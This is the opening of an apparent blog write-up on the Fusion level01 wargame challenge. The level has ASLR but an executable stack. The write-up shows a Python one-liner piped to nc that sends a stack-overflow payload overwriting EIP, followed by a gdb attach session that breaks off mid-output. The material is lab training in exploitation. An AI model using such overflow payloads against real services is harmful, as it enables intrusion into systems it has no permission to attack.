Posts List

Fusion level01 write-up

This level implements stack/heap/mmap ASLR but the stack is still executable. The code provided is exactly the same but there is no info leak this time.

We start off overwriting EIP to crash the application and taking a look:

    python -c 'print "GET " + "A"*139 + "DDDD" + " HTTP/1.1" + "\x90"*16 + "B"*80' | nc localhost 20001

Monitoring with gdb we get:

    (gdb) attach 1521
    Attaching to program: /opt/fusion/bin/level01, process 1521
    Reading symbols from /lib/i386-linux-gnu/libc.